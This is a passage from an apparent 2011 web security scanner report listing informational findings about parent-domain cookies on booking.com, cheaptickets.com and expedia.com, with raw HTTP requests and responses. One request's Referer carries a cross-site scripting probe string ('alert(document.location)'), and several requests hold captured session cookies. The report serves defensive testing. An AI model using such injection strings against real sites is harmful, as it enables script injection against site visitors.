User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
13.149. http://www.booking.com/index.en-us.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
13.150. http://www.booking.com/logo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /logo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logo?ver=1;t=13176005551 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:52 GMT
Server: Apache
Set-Cookie: BJS=-; domain=booking.com; expires=Tue, 04-Oct-2011 00:10:52 GMT; HTTPOnly
Set-Cookie: ramala=97.0378530025482; domain=booking.com; expires=Tue, 04-Oct-2011 00:10:52 GMT; HTTPOnly
Content-Length: 35
Content-Type: image/gif

GIF89a.............,..............;
13.151. http://www.booking.com/searchresults.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
13.152. http://www.cheaptickets.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
13.153. http://www.expedia.com/Hotel-Search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Content-Length: 1104
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetContro
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:10:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: iEAPID=00000,; Domain=.expedia.com; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Set-Cookie: ipsnf3_ext=; Domain=.expedia.com; Expires=Sun, 03-Oct-2010 00:10:25 GMT; Path=/
Content-Length: 589661
